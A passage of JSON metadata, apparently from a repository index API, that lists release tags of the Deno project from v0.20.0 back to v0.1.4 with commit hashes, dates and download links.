GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c